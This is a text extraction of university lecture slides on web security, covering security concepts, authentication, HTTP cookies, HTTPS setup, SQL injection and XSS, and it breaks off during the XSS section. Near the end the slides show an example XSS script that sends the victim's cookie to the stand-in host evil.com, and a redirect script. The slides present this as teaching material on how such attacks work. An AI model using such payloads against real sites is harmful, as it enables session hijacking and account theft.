Web Security - WordPress.com
advertisement
Dr. Theodosis Mourouzis
8 Dec 2015
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
1
•
Introduction to Security
•
Historical Overview
•
Authentication
•
Web Architecture
•
Threats Landscape
•
Secure Online Communication
- Trusted Third Parties (TTP): Certification Authorities (CA)
- SSL/TLS Protocol
- OpenID
Web Security Lecture by Dr Theodosis Mourouzis (c)
OUTLINE
2
OUTLINE
•
Web Vulnerabilities
- SQL Injections
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
•
Remediation Measures
•
PCI-DSS Compliance
•
Risk Management Framework
•
Conclusions
Web Security Lecture by Dr Theodosis Mourouzis (c)
- Account (Username/Password ) Enumerations
3
Instructor (Theodosis Mourouzis)
•
BSc in Mathematics (University of Cambridge)
•
MSc in Mathematics (University of Cambridge)
•
MRes in Security Science (University College London)
•
PhD in Information Security & Cryptography (University College London)
•
Several awards in national (CY) competitions in mathematics, physics, statistics and 3-times
member of the Cyprus National Team participating International Mathematical Olympiads.
•
Recipient of the UK University Cipher Champion 2013 award
Professional Experience
•
Security Architect in a TSB funded project related to device-centric models
•
Security SME at Digital Security & Fraud at Lloyds Banking Group
•
Independent Consultant for Security and Analytics
Web Security Lecture by Dr Theodosis Mourouzis (c)
Academia
4
Research Interests
•
Fraud Analytics
- Cybersecurity threats’ detection
•
Security Analysis of Cryptographic Primitives
- Security Analysis of systems used for confidentiality and integrity of data
- Russian Cryptography (GOST block cipher & hash function)
•
Human and Device – centric models for authentication
- Passwords
- Multiple-factor authentication techniques
- Use the device as a token for authentication and biometrics involved
Web Security Lecture by Dr Theodosis Mourouzis (c)
- Use Big Data and Analytics to detect/prevent fraud
5
Motivational Example
•
The connected in a clever way all major online-stores and ensured goods at a very descent
prices
•
Their idea was involving storing (in a database) and processing (online) customers’ creditcard information
The Happy Side
•
Customers found a lot of value in the idea and company’s website started gaining a lot of
reputation.
•
Huge traffic every week from all around the world !
•
In a period of a year, they were processing credit-card data of about 100M users worldwide !
•
The start-up was not a start-up anymore …but a reputable company with over 100
employees.
•
All financial consultants were ensuring Alice (the CEO of the company) that her company
is going to grow a lot in the coming years.
Web Security Lecture by Dr Theodosis Mourouzis (c)
Once Upon a Day … two friends, Alice and Bob, decided to start working on a fabulous
start-up idea.
6
Motivational Example
•
Unfortunately, Bob (who became the CIO of the company) was neither
security aware nor technology-driven
•
He declined all financial decisions to enhance company’s online security and
information security policy
•
One rainy morning … a malicious hacker managed to penetrate into the
online infrastructure of the company and exposed the database where
customer’s credit card’s were stored
•
The malicious hacker easily “unlocked” the password-protected
database…which was protected with the password “BobCIO”
Web Security Lecture by Dr Theodosis Mourouzis (c)
The Dark – Side
7
•
The malicious hacker published the database online
•
One of the biggest credit-card frauds has just started
•
In a few minutes, all the money of about 100M users disappeared
Some really bad consequences for Alice and Bob…
•
The media started reproducing this incident
•
People started spoiling company’s reputation
•
All credit-card major players declined to collaborate with this company anymore
and sued the company for breaching the terms and conditions regarding
information security compliance
•
Financial and credit-card regulators penalised the company with huge fines
•
The company eventually bankrupted and both CEO and CIO are facing jail
penalties
Web Security Lecture by Dr Theodosis Mourouzis (c)
Motivational Example
8
Motivational Example
What is the meaning of this example ?
Do you still think security is a science fiction thing?
Web Security Lecture by Dr Theodosis Mourouzis (c)
What have you really learned from this?
9
Telecom company which provides
pay TV and internet access
Occurred: < 23 Oct 2015
150K TalkTalk customers affected
15,656 Bank Accounts hacked
4% of 4M customers affected
Hacked twice last year
Criticised for lack of information
security
Web Security Lecture by Dr Theodosis Mourouzis (c)
Recent Breaches
10
Web Security Lecture by Dr Theodosis Mourouzis (c)
Recent Breaches
11
Recent Breaches
Lots of examples …
Web Security Lecture by Dr Theodosis Mourouzis (c)
Confidential Data Breaches
12
•
76% of U.S companies had a Cybersecurity incident within the past 12
months [Source: online.wsj.com]
•
71% of breaches in 2015 occurred in business with 100 employees or less
[Source: Forbes]
•
80% of small business that Experience a data breach suffer serious financial
losses [Source: sileo]
•
22% probability your company will experience a breach which compromises
at least 10K records [Source: Dell]
•
It takes 33-365 days for a company to detect or know its been breach !
•
70% of security incidents that cost enterprise money involves insiders
Web Security Lecture by Dr Theodosis Mourouzis (c)
Interesting Statistics
13
Food for thought
Do I understand the online threats involved to my business?
Do I really understand the potential impact of security to my business?
Do I know what can I do about it?
Web Security Lecture by Dr Theodosis Mourouzis (c)
By the end of this lecture you need to ask yourself …
14
What is security ?
Web Security Lecture by Dr Theodosis Mourouzis (c)
Introduction to Security
15
Web Security Lecture by Dr Theodosis Mourouzis (c)
Introduction to Security
16
Introduction to Security
•
People may include employees and customers along with other invited
persons such as contractors or guests.
•
Property assets consist of both tangible and intangible items that can be
assigned a value
•
Intangible assets include reputation and proprietary information such as
databases, software code, critical company records e.t.c
Web Security Lecture by Dr Theodosis Mourouzis (c)
[asset]: people, property and information.
17
Introduction to Security
[Information Security]
Access,
Use,
Disclosure,
Disruption,
Modification,
Inspection,
Recording,
Destruction,
etc …
Web Security Lecture by Dr Theodosis Mourouzis (c)
The practise of defending information from unauthorized
18
Introduction to Security
Confidentiality
Integrity
Availability
(known as the CIA triangle)
Non-Repudiation
Authenticity
Web Security Lecture by Dr Theodosis Mourouzis (c)
Key Concepts
19
Introduction to Security
•
Preserving authorized restrictions on access and disclosure, including means
for protecting personal privacy and proprietary information
•
Only the authorized recipient is able to reveal the content of a message that
is supposed to be confidential
•
Set of rules that limits access and/or places restrictions on certain types of
information
•
Goes back to the beginning of the civilization – lots of techniques developed
during wars
Web Security Lecture by Dr Theodosis Mourouzis (c)
[confidentiality]
20
Introduction to Security
[confidentiality]
•
Restricted
- data protected by state or federal privacy regulations
•
Private
- everything not classified as restricted or public
•
Public
Web Security Lecture by Dr Theodosis Mourouzis (c)
Data Classification
21
Introduction to Security
[confidentiality]
•
Top Secret
•
Secret
•
Confidential
•
Restricted
•
Official
•
Unclassified
•
Clearance
Web Security Lecture by Dr Theodosis Mourouzis (c)
Detailed Classification Levels
22
Introduction to Security
•
Protecting the content of a message from altering during transit either on
purpose or accidentally
•
Guarding against improper information modification or destruction,
Web Security Lecture by Dr Theodosis Mourouzis (c)
[Integrity]
23
Introduction to Security
•
Ensure that the resources that you sell or buy are always available
•
Ensure timely and reliable access to and use of information
Web Security Lecture by Dr Theodosis Mourouzis (c)
[availability]
24
Introduction to Security
[Non-repudiation]
The sender of the message cannot later deny that he did sent a message
- If you sign a cheque you cannot later deny
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
25
Introduction to Security
[authenticity]
Make sure that the one is the one supposed to be
•
Trustfulness of origins
•
Is the page I m visiting online the one supposed to be ?
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
26
Introduction to Security
[continuity]: information should be continuously available to the business
user and this is ensured thorough appropriate business continuity and
disaster preparedness
Web Security Lecture by Dr Theodosis Mourouzis (c)
…and another one requirement which is more business oriented …
27
Web Security Lecture by Dr Theodosis Mourouzis (c)
Historical Overview
28
•
Human desire to communicate secretly is at least as old as writing itself
•
This desire goes back to the beginnings of civilization
•
Main goal was transmission of messages in the presence of unauthorized
parties, especially during military operations
•
Methods of secret communication were developed by many ancient societies
Alice
Hi Bob
Bla, bla
- Alice
Bob
Eve
Web Security Lecture by Dr Theodosis Mourouzis (c)
Historical Overview
29
Historical Overview
Many examples of attempts for secure communication
- Julius Caesar (100 BC)
-- simple transposition ciphers
- WWI: use of radio for exchanging messages
-- need for more secure techniques to prevent interception
- WWII: shift to electromagnetic rotor machines
-- Enigma machine by the Germans
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
30
•
Julius Caesar (100 BC – 44 BC) – Roman Emperor
•
He invented a technique to send messages in a form that was preventing
unintended persons to read it
•
Even his messenger was not capable of reading the messages
•
The technique is known as Ceasar Cipher
Web Security Lecture by Dr Theodosis Mourouzis (c)
Historical Overview
31
Historical Overview
Message …
“ My spies must send me information regarding rivers, water, mountain
coordinates and the time the guards are protecting the main gate”
•
What an unintended recipient read…
“Pb vslhv pxvw vhqg ph lqirupdwlrq uhjduglqj ulyhuv, zdwhu, prxqwdlq
frruglqdwhv dqg wkh wlph wkh jxdugv duh surwhfwlqj wkh pdlq jdwhrw wr
eh, Wkdw lv wkh txhvwlrq”
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
32
Historical Overview
Security Evolved tremendously …
-- Electro-magnetic rotor machines
--- Complex mathematical problems which are hard to be solved
(elliptic curves, integer factoring)
Web Security Lecture by Dr Theodosis Mourouzis (c)
- Simple mathematical rules
33
Web Security Lecture by Dr Theodosis Mourouzis (c)
Security Evolved …
34
Historical Overview
(Different Notions)
•
Use of secrecy of the design or implementation to provide security
•
Designers of such systems believe that if the flaws are not known, then
attackers will be unlikely to find them
•
However, a system might have theoretical or actual security vulnerabilities
•
Sometimes used as a defence in depth measure
Web Security Lecture by Dr Theodosis Mourouzis (c)
Security though obscurity
35
Historical Overview
(Different Notions)
•
Security though obscurity is discouraged and not recommended by standard
bodies
•
National Institute of Standards and Technology (NIST) in US recommends
against this practise “System security should not depend on the secrecy of the
implementation or its components”
•
Follow open source philosophies, methodologies and standards when
implementing systems
Web Security Lecture by Dr Theodosis Mourouzis (c)
Open Security
36
Historical Overview
(Different Notions)
Compatible implementations
Scrutinized and analysed by prominent security experts
All major flaws and vulnerabilities would be revealed quickly
Security is collaboratively improved
Transparency
Web Security Lecture by Dr Theodosis Mourouzis (c)
Advantages of Open Security
37
Risks – Treats - Vulnerabilities
[threat]: anything that can exploit a vulnerability, intentionally or
accidentally, and obtain, damage or destroy an asset
“A threat is what we’re trying to protect against”
Web Security Lecture by Dr Theodosis Mourouzis (c)
“An asset is what we are trying to protect”
38
Risks – Treats - Vulnerabilities
Human Threats: Events that are either enabled by or caused by human
beings, such as unintentional acts (inadvertent data entry) or deliberate
actions (network based attacks, malicious software attack, unauthorized
access to confidential information)
Environmental Threats: Long-term power failure, pollution, chemicals,
liquid leakage
Web Security Lecture by Dr Theodosis Mourouzis (c)
Natural Threats: Floods, earthquakes, tornadoes, avalanches
39
Risks – Treats - Vulnerabilities
“A vulnerability is a weakness or gap in our protection efforts”
Web Security Lecture by Dr Theodosis Mourouzis (c)
[vulnerability]: weakness or gaps in a security program that can be
exploited by threats to gain unauthorized access to an asset
40
Risks – Threats - Vulnerabilities
“Risk is the intersection of assets, threats and vulnerabilities”
Web Security Lecture by Dr Theodosis Mourouzis (c)
[risk]: the potential for loss, damage or destruction of an asset as a result of a
threat exploiting a vulnerability
41
RISK
Threats
Vulnerabilities
Business disruption
Angry employees
Software bugs
Financial losses
Dishonest employees
Broken processes
Loss of privacy
Criminals
Ineffective controls
Damage to reputation
Governments
Hardware flaws
Loss of confidence
Terrorists
Business change
Legal penalties
The press
Legacy systems
Impaired growth
Competitors
Inadequate BCP
Loss of life
Hackers
Human error
Nature
Web Security Lecture by Dr Theodosis Mourouzis (c)
Risks – Threats - Vulnerabilities
42
Risks – Threats - Vulnerabilities
Web Security Lecture by Dr Theodosis Mourouzis (c)
NIST threat-vulnerability pairings table:
43
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication
44
Authentication
Basic Concepts:
[identification]: declare who you are
{entity}[authentication]: prove it
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication (from Greek: αὐθεντικός ) is the method of confirming the
truth of an attribute of a single piece of data claimed true by an entity. It is
the process of confirming an identity.
45
Authentication
Something the user knows: password, partial password, pass-phrase,
Personal Identification Number(PIN), security question
Something the user has: wrist band, ID card, security token, cell phone
with built-in hardware token
Something the user is: fingerprint, retinal pattern, facial recognition,
voice
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication Factors
46
Authentication
Web Security Lecture by Dr Theodosis Mourouzis (c)
Multiple-Factor Authentication: combining several [INDEPENDENT]
authentication techniques together.
47
•
[Nowadays] 2-Factor-Authnetication (2FA) are used to protect money
(Internet Banking)
•
Shift to 3-Factor quite soon
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication
48
Even though the authentication area is widely studied, security still relies
on passwords
Password: string of characters used for certain authentication to prove
identity or access approval to gain access to a resource
It MUST be as hard as possible for someone to guess it
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication
49
•
A lot of research focused on “password’s strength” formalization
•
Many different metrics/policies to ensure strong passwords were introduced
•
Password strength: likelihood that a password cannot be guessed and
varies with the attack algorithm used
- too vague !
- more formal definitions based on entropy and randomness were
introduced
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication
50
•
Policies to ensure strong passwords are very often introduced
•
Security awareness campaigns to help people selecting stronger
passwords
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication
51
•
However, at the end the selection is done by a HUMAN
•
We cannot remember long, complex and random looking strings
•
We tend to make selections that are easy to remember
•
We tend to use same passwords across many different sites
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication
52
Authentication
A=K2z!43&Z2~B_d4-o3@(5)!h6c7=x08H1
Web Security Lecture by Dr Theodosis Mourouzis (c)
A very “secure password” is expected to be like …
53
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication
54
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication
55
•
We need systems that are both secure and usable … otherwise it will lead
to failure
•
They often tend to be inversely related which implies complex engineering
problems and a lot of thinking !
•
Imagine a system in which you have to type a 30
characters password and you need to carry with you a security token ?
Web Security Lecture by Dr Theodosis Mourouzis (c)
Security Design
56
Web Security Lecture by Dr Theodosis Mourouzis (c)
Authentication
57
Authentication
Password Policies
Password Complexity
- does not contain the name of the user, real name or company name
- at least 8 characters long
- It contains characters from three of the following 4 categories
-- Latin uppercase letters (A-Z)
-- Latin lowercase letters (a-z)
-- Base 10 digits (0-9)
-- Special characters (!,$,%,#)
Web Security Lecture by Dr Theodosis Mourouzis (c)
58
Authentication
Password Policies
Password Expiration
- change passwords every some time (1-6 months)
Password Use
- avoid using same password for accessing multiple accounts
Web Security Lecture by Dr Theodosis Mourouzis (c)
59
A fair introduction
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Architecture
60
Web Architecture
An approach to the design and planning of websites that involve technical,
aesthetic and functional criteria.
Focus on the user and on user requirements
- web content
- usability
- interaction design
- information architecture
- web design
- technology stack
Web Security Lecture by Dr Theodosis Mourouzis (c)
61
Web Architecture
A web application or web service is a software application that is accessible
using a web browser or HTTP(s) user agent.
Web Security Lecture by Dr Theodosis Mourouzis (c)
What is a Web Application?
62
Web Architecture
A network architecture in which each computer/process on the network is
either a client or a server
Servers are powerful computers or processes dedicated to managing disk
drives, printers or network traffic.
Clients are PCs or workstations on which users run applications.
Web Security Lecture by Dr Theodosis Mourouzis (c)
Client-Server Architecture (two-tier architecture)
63
Example: Client needs to access for example Wikipedia or shopping websites
like Amazon via his/her browser. The Web Server is responsible for serving
the content requested by the user.
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Architecture
64
•
Web Servers: Apache HTTP server, Microsoft ISS (Internet Information
Services), Sun Java System Web Server
•
Database: DB is a separate entity, logically (and often physically)
•
Data: user data is a part of the browser
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Architecture
65
Web Architecture
Protocol: http, ftp, tor , https
Address of the host: Translated to an IP address by DNS (e.g. 128.8.127.3)
Web Security Lecture by Dr Theodosis Mourouzis (c)
A client requested a content by URL (Universal Resource Location)
66
Web Architecture
Path to a resource
…./index.html (static content – fixed file returned by the server)
…/apple.php (dynamic content – the server generated the content on the
fly)
Web Security Lecture by Dr Theodosis Mourouzis (c)
67
Web Architecture
Web Security Lecture by Dr Theodosis Mourouzis (c)
HTTP (Hypertext Transfer Protocol) is the Internet Application Protocol used
for communication (exchange of data) between client and server. It runs on
top of TCP.
68
Web Architecture
User Clicks on a website (HTTP Request on buttonClick)
Request contains:
The URL of the Resource, Headers describing what the browser can do
Request Types: GET (no server-side effects), POST (data sent to server –
side-effects)
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
69
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Architecture
HTTP GET Requests
70
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Architecture
HTTP GET POSTS
71
Web Architecture
•
Response contains:
- Status Code: e.g. 200 OK
- Headers describing what the server provides
- Data
- Cookies (represent state the server would like the browser on its behalf – maintain notion of session)
Web Security Lecture by Dr Theodosis Mourouzis (c)
A Response(after a Request) is sent and rendered to the browser
72
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Architecture
73
Web Architecture
•
An HTTP cookie is a small piece of data sent from a website and stored in a user’s web browser
while the user is browsing that website
•
Every time the user loads the website, the browser sends the cookie back to the server to notify
the website of the user’s previous activity
Applications
•
Remember state-full information (e.g. items in shopping card)
•
Record user’s browsing activing
•
Third-party tacking cookies, used to compile long-term records of individuals browsing histories –
PRIVACY CONCERN
- EU and US law makers took action in 2011 around this
•
Storing information such as passwords or credit cards
•
Authentication cookies: most common method used by web servers to know whether or not the
user is logged in or not and which account. This helps webserver to ensure they send sensitive
information to the legitimate users
Web Security Lecture by Dr Theodosis Mourouzis (c)
COOKIES
74
Web Architecture
COOKIES
Cookie parameters are set in a Set-Cookie response header
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: domain=widget.com; path=/; secure; Account=766324
Content-Type: text/html
Content-Length: 327
Date: Tue, 25 Sep 2007 14:15:51 GMT
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
75
Web Architecture
COOKIES
•
expires=<date>: determines when cookie will be deleted
•
domain=<domain name> : cookie will be returned to each domain that ends
with this value
•
path=<path name> : cookie will be returned only for requests that start with
this path
•
secure : if present, cookie will be returned only with HTTPS (secure HTTP)
requests
•
<name>=<value> : allow arbitrary data to be stored in a cookie
Web Security Lecture by Dr Theodosis Mourouzis (c)
COOKIE PARAMETERS
76
Web Security Lecture by Dr Theodosis Mourouzis (c)
Threats Landscape
77
Threats Landscape
[Black Hat] A person who hacks into a computer network with malicious or
criminal intent.
[Grey Hat] A person whose ethical standards fall somewhere between purely
altruistic and purely malicious.
[White Hat] A person who hacks into a computer network in order to test or
evaluate the security of the system.
Web Security Lecture by Dr Theodosis Mourouzis (c)
The types of hackers
78
Threats Landscape
•
software attacks:
- virus, worms, malware, Trojan horse,
- phishing attacks
•
intellectual property theft,
•
identity theft,
•
theft of equipment or information,
•
sabotage,
•
information extortion
Web Security Lecture by Dr Theodosis Mourouzis (c)
Computer System Threats come in many forms and in all sorts of shapes
and sizes
79
Threats Landscape
An attack that attempts to acquire sensitive information (such as usernames,
passwords, and credit card details) often for malicious reasons by
impersonating a trustworthy entity in an electronic communication.
It is usually the first step in an attack, like malware attack.
Web Security Lecture by Dr Theodosis Mourouzis (c)
[Phishing Attack]
80
Web Security Lecture by Dr Theodosis Mourouzis (c)
Threats Landscape
81
Threats Landscape
Hackers take advantage of Social Networks to attack people since people trust
these networks and they may not be able to tell that the site being visited, or
program being used, is not real.
Web Security Lecture by Dr Theodosis Mourouzis (c)
Risk of Phishing grows in Social Media:
82
83
Web Security Lecture by Dr Theodosis Mourouzis (c)
84
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security Lecture by Dr Theodosis Mourouzis (c)
Threats Landscape
85
Threats Landscape
Web Security Lecture by Dr Theodosis Mourouzis (c)
[malware] short for “malicious software”, a software which is specifically
designed to disrupt or damage a computer system or steal personal
information or do unwanted actions on a computer system
Examples:
Viruses
Worms
Trojans
Spyware/Spyware
Source: PandaLabs Security
86
Web Security Lecture by Dr Theodosis Mourouzis (c)
Threats Landscape
87
Web Security Lecture by Dr Theodosis Mourouzis (c)
Threats Landscape
88
Threats Landscape
A non-technical method of attack that relies heavily on human interaction and
often involves tricking people into breaking normal security procedures.
It is one of the greatest threats that organizations encounter today.
Web Security Lecture by Dr Theodosis Mourouzis (c)
[social engineering]
89
Web Security Lecture by Dr Theodosis Mourouzis (c)
Data Breaches
90
Web Security Lecture by Dr Theodosis Mourouzis (c)
Secure Online Communication
91
Secure Online Communication
Suppose that your information is transmitted over the network.
Web Security Lecture by Dr Theodosis Mourouzis (c)
Then, anyone who can intercept the traffic can read all your details.
92
Secure Online Communication
Web Security Lecture by Dr Theodosis Mourouzis (c)
The solution is cryptography !
93
Secure Online Communication
Web Security Lecture by Dr Theodosis Mourouzis (c)
But are you sure you are connected to the page you are supposed to connect?
94
Secure Online Communication
It is widely used in the electronic transfer of secure data
The TTP uses cryptography and other security measures to authenticate
the identity of the sender, the security of the data during transmission and
to verify delivery to the intended recipient.
Examples: banks, Certification Authorities (CA)
Web Security Lecture by Dr Theodosis Mourouzis (c)
A Trusted Third Party (TTP) is an entity which facilitates interactions
between two parties who both trust the third party.
95
•
We have SSL/TLS protocol which is responsible for securing data traveling
from the user’s PC to the server over the internet
•
The primary goal is to provide privacy and data integrity between two
communicating computer applications
1.
The connection is private because all data are encrypted
2.
The identity of communicating parties is authenticated and verified by a
Third Party which is a recognized authority
3.
Each message is guaranteed to arrive unchanged to the intended recipient
Web Security Lecture by Dr Theodosis Mourouzis (c)
Secure Online Communication
96
Secure Online Communication
•
If you collect ANY sensitive information (username, password) or involved in
any financial transactions then you need to enable HTTPS
•
Any information going to and from the server is automatically encrypted
•
SSL prevents hackers from sniffing out your visitor’s sensitive information
as it passed through the WEB
•
Visitors feel more secure when the green lock appears as this means a
security certificate is protecting the site
Web Security Lecture by Dr Theodosis Mourouzis (c)
Setting up SSL (HTTPS) on your website
97
Secure Online Communication
•
If you try to write https://www.mywebsite.com it will not work right now
•
You need to install an SSL certificate in the first place
•
You can set it up in 5 simple steps
- Host with a dedicated IP address
- Buy a certificate
- Activate the certificate
- Install the certificate
- Update your site to use HTTPS
Web Security Lecture by Dr Theodosis Mourouzis (c)
Setting up SSL (HTTPS) on your website
98
Secure Online Communication
Setting up SSL (HTTPS) on your website
•
Lots of smaller web hosting plans put you on a shared IP where multiple
other websites are using the same location.
•
With a dedicated IP you ensure that the traffic going to that IP address is
only going to your website and no one else’s.
Web Security Lecture by Dr Theodosis Mourouzis (c)
Step 1 [Host with a dedicated IP address]:
99
Secure Online Communication
Setting up SSL (HTTPS) on your website
•
Something that proves your website is your website (think of it like an ID
card)
•
When a user visits your site, the browser trusts the site by checking the
certificate and everything is encrypted after the “handshake”
•
You can create a “self-signed” one but it is not trusted by modern browsers
•
Places to buy certificates
Web Security Lecture by Dr Theodosis Mourouzis (c)
Step 2 [Buy a Certificate]:
100
Secure Online Communication
Setting up SSL (HTTPS) on your website
•
The host can possibly do this for you- check it
•
Generate a Certificate Signing Request (CSR) within your hosting control
panel – such as WHM or cPanel.
•
Go to SSL/TLS admin area and choose “Generate an SSL certificate and
Signing Request” and fill the form.
Web Security Lecture by Dr Theodosis Mourouzis (c)
Step 3 [Activate the Certificate]:
101
Web Security Lecture by Dr Theodosis Mourouzis (c)
Secure Online Communication
102
•
Copy the first block (since you need the CSR to give to the SSL cert issuer to
establish your ID) and go to the vendor’s site where you bought the
certificate and pass CSR and any other fields needed.
•
It will ask you for an approval email. This email proves you own the domain
i.e. webmaster@domain.com. You need to create it.
Web Security Lecture by Dr Theodosis Mourouzis (c)
Secure Online Communication
103
Secure Online Communication
Setting up SSL (HTTPS) on your website
•
The host might do it for you
•
If not, paste the certificate in your web host control panel. If you use WHM,
Cpanel click “Install an SSL Certificate” under the SSL/TLS menu
•
Paste it and submit
Web Security Lecture by Dr Theodosis Mourouzis (c)
Step 4 [Install the certificate]:
104
Secure Online Communication
Setting up SSL (HTTPS) on your website
•
Now https://www.mywebsite.com works
•
However, you need to make sure they access your site through HTTPS
•
You can enable it for all pages but you can also do it for a subset of them
Example of Apache Server configuration for redirection:
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(cart/|checkout/) https://%{HTTP_HOST}%{REQUEST_URI}
Web Security Lecture by Dr Theodosis Mourouzis (c)
Step 5 [Update your site to use HTTPS]:
105
Secure Online Communication
•
HTTPS does not protect information on your server. It only protects
TRANSFER of data from your visitor’s computer to yours.
•
It is your obligation to make sure data is safe on your server
Web Security Lecture by Dr Theodosis Mourouzis (c)
Important Stuff
106
•
OpenID is an open standard and decentralized protocol by the non-profit
OpenID foundation
•
It allows users to be authenticated by certain co-operating sites, known as
Relying Parties (RP) using a third party service
Web Security Lecture by Dr Theodosis Mourouzis (c)
OpenID
107
•
The OpenID standard provides a framework for the communication that
must take place between the identity provider and the OpenID acceptor (RP)
•
An extension to the standard, OpenID Attribute Exchange, facilitates
securely the transfer of user attributes, such as name and gender, from the
OpenID identity provider to the relying party
•
This eliminates the need for webmasters to provide their own ad-hoc
systems and allowing users to consolidate their “digital identities”
•
Users can log into multiple unrelated websites without having to register
with their information over and over again
Web Security Lecture by Dr Theodosis Mourouzis (c)
OpenID
108
•
Several large organizations either issue or accept OpenIDs on their
website according to the OpenID foundation
- AOL, Blogger, France Telecom, Google, Microsoft, Yahoo! …
- Facebook stopped using OpenID and uses Facebook Connect
•
Users create accounts by selecting an OpenID identity provided and then
use those accounts to sign onto any website which accepts OpenID
authentication
•
You can rely on the security an OpenID provider which is assumed to be
very secure
Web Security Lecture by Dr Theodosis Mourouzis (c)
OpenID
109
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
110
Web Security
Simply, “The security of web applications”
Web Security Lecture by Dr Theodosis Mourouzis (c)
What is Web Application Security ?
111
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
112
•
End User Security and awareness programs reside in the policies,
procedures, and awareness layer of the Defense in Depth model
•
User security awareness can affect every aspect of an organization’s security
profile
•
User awareness is a significant part of comprehensive security profile
because many attack types rely on human intervention
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
113
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
114
Web Security
Web Security Lecture by Dr Theodosis Mourouzis (c)
Common Web Application Security Mistakes
115
Web Security
•
Trusting Client-Side Data
-- Identify all input parameters that trust client-side data
-- Check for un-escaped special characters in input strings
! @ $ % ^ & * ( ) -_ + ` ~ \ | [ ] { } ; : ' " ? / , . > <
•
Authentication mechanisms using technologies such as JavaScript
or ActiveX (hard for developers t understand attacks such as XSS, XSRF)
•
Lack of re-authenticating the user before issuing new passwords or
performing critical tasks
•
Hosting of uncontrolled data on a protected domain
Web Security Lecture by Dr Theodosis Mourouzis (c)
-- Do not TRUST client-side data!
116
Web Security
•
Comment Lines
•
URL Extensions
•
Meta Tags
•
Cookies
•
Client-side scripting languages
•
Error and Response Codes
- HTTP Response Headers
- Error Messages
Web Security Lecture by Dr Theodosis Mourouzis (c)
Beware of Identifiable Characteristics
117
Web Security
•
The attacker will try to send particular requests to the application to check
if it replies back in different manners
•
The message from the web-server needs to be different when something is
correct and when something is wrong
-- “Invalid Username”, “Incorrect Password”
Web Security Lecture by Dr Theodosis Mourouzis (c)
Username/Password Enumeration
118
•
The attacker has now some information to proceed in his attack, e.g. a valid
username
•
The application should not reveal, directly or indirectly, any information
useful for enumerating users
•
In case of wrong username/password, the application should return generic
messages
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
119
Web Security
SQL Injection
The attack behind most of the data breaches
•
Attacker’s target is to extract information from the Server’s DB
•
It is an input validation vulnerability, where unsanitized user input in SQL
query to back-end DB changes the meaning of query
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
120
•
Typical Login Prompt
•
User Input Becomes Part of Query
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
121
•
Malicious User Input
•
SQL Injection Attack
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
122
Web Security
CardSystems Attack (June 2005)
CardSystems was a major credit card processing company
Put out of business by a SQL injection attack !
- Credit Card numbers stored unencrypted
- Data on 263,000 accounts stolen
- 43M identities Exposed
Web Security Lecture by Dr Theodosis Mourouzis (c)
123
Web Security
Countermeasures
Input Validation
- Filter: apostrophes, semicolons, percent symbols, hyphens, any character
with special meaning
- Check the data type
•
Whitelisting
- Blacklisting “bad” characters does not really work
- Whitelist a well-defined set of safe values
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
124
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
125
Web Security
Cross-Site Scripting (XSS)
- Outside client-side languages, executing within the users web environment
with the same level of privileges as the hosted site
- USE CSS to exploit a browser hole to download a Trojan/virus
- Client-Side scripting languages
-- DHTML (HTML,XHTML,HTML x.o)
-- Javascript, Java(applets), VBScript
-- Flash, ActiveX, XML/XSL, CSS
Web Security Lecture by Dr Theodosis Mourouzis (c)
- Attack targets the user of the system rather than the system itself
126
Web Security
Web Security Lecture by Dr Theodosis Mourouzis (c)
1. Attacker injects malicious code into vulnerable web server
127
1.
Attacker injects malicious code into vulnerable web server
2.
Victim visits vulnerable web server
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
128
1.
Attacker injects malicious code into vulnerable web server
2.
Victim visits vulnerable web server
3.
Malicious code is served to victim by web server
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
129
1.
Attacker injects malicious code into vulnerable web server
2.
Victim visits vulnerable web server
3.
Malicious code is served to victim by web server
4.
Malicious code executes on the victims with web server’s privileges
Web Security Lecture by Dr Theodosis Mourouzis (c)
Web Security
130
Web Security
Stealing cookie via XSS
Attacker injects script that reads the site’s cookie
•
Scripts send the cookie to the attacker
•
Attacker can now log into the victim’s site
<script>
var img = new Image();
img.src =
“http://evil.com/log_cookie.php?” + document.cookie
</script>
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
131
Web Security
Redirect the user via XSS
Attacker injects script that automatically redirects victim to attacker’s site
<script>
document.location =
“http://evil.com”;
</script>
Web Security Lecture by Dr Theodosis Mourouzis (c)
•
132
Web Security
•
Attacker injects a script that redirects the victim to a “familiar website” (e.g.
the site of a bank)
•
Fake page asks for user’s credentials or other sensitive information
•
